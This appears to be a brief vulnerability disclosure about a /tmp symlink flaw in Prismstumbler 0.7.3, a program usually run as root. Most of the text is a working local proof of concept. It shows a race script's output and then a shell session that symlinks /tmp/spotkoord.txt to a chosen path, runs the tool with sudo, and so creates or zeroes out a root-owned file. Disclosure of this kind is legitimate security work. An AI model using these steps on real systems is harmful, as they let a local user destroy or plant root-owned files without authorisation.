I found a symlink vuln in this older program.

Prismstumbler 0.7.3 is most often ran as root to utilize all of capabilities.

Prismstumbler (pst) creates /tmp/.psintercom and /tmp/spotkoord.txt as default.  Can be changed within preferences.

srw-rw-rw-  1 root    root          0 2009-04-02 00:44 .psintercom
-rw-r--r--  1 root    root          0 2009-04-02 00:44 spotkoord.txt

The /tmp/spotkoord.txt file follows symlinks and zeros out linked file.  While /tmp/.psintercom actually checks to see if it is there or not.

#
guy@Tengu:~/Tools$ sh tmp-racer.sh /tmp/spotkoord.txt sudo pst
Attempting to crack sudo...
[sudo] password for root: 
Expected pid: 31425
Actual pid:   31425
Exit status: 0
Files /tmp/dir.31416/target and /tmp/dir.31416/original differ

I cracked sudo
#

Creation of root owned files.  Or clobbering of root owned files.

guy@Tengu:/tmp$ ls -la rootfile
ls: cannot access rootfile: No such file or directory
guy@Tengu:/tmp$ ln -s rootfile spotkoord.txt
guy@Tengu:/tmp$ sudo pst
Can't connect to localhost.2947: Connection refused
eth1: ERROR while getting interface flags: No such device
Can't open pcap device: Operation not supportedCan't open pcap device: Operation not supportedguy@Tengu:/tmp$ 
guy@Tengu:/tmp$ ls -la rootfile
-rw-r--r-- 1 root root 0 2009-04-02 01:45 rootfile
guy@Tengu:/tmp$